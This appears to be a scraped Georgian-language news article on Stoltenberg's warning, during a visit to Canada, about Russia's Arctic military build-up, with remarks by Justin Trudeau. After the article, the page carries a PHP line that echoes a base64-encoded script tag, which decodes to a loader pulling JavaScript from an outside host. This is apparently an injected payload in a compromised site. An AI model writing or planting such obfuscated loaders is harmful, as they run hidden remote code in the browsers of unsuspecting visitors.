celsiusi
ავერსი საქკაბელი
ნატო-ს გენერალური მდივნის, იენს სტოლტენბერგის თქმით, ჩრდილოეთში, არქტიკაში რუსეთის სამხედრო ძალების ზრდა ჩრდილოატლანტიკური ალიანსისთვის სტრატეგიული გამოწვევაა. ამის შესახებ ნატო-ს გენერალურმა მდივანმა კანადაში ვიზიტისას განაცხადა, სადაც ქვეყნის პრემიერ-მინისტრ ჯასტინ ტრუდოს შეხვდა.
 
სტოლტენბერგის თქმით, საჭიროა ამავე რეგიონში ნატო-ს ძალების პროპორციულად გაძლიერება.
 
„სულ უფრო მნიშვნელოვან რეგიონად ხდება კანადისა და მთლიანად ნატო-სთვის უკიდურესი ჩრდილოეთი, რამდენადაც იქ ჩვენ ვხედავთ რუსული სამხედრო ძალის არსებით ზრდას, ახალი ბაზებითა და ახალი სისტემური შეიარაღებით“, – აღნიშნავს სტოლტენბერგი.
 
თავის მხრივ, ჯასტინ ტრუდომ აღნიშნა, რომ ბოლო თვეების განმავლობაში, გეოპოლიტიკურმა ვითარებამ მნიშვნელოვანი ცვლილებები განიცადა.
 
„კარგად გვესმის, რომ რუსეთი ყველა ჩვენგანში მზარდ შეშფოთებას იწვევს, ჩვენ დროულად მიგვაჩნია ამ საკითხზე ჩვენი მოსაზრებების გაზიარება ნატო-სთან, NOღAD-ის (ჩრდილოეთ ამერიკის საჰაერო კოსმოსური თავდაცვის სარდლობა) არსებული მექანიზმების გამოყენებით“, – განაცხადა ტრუდომ.
511
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");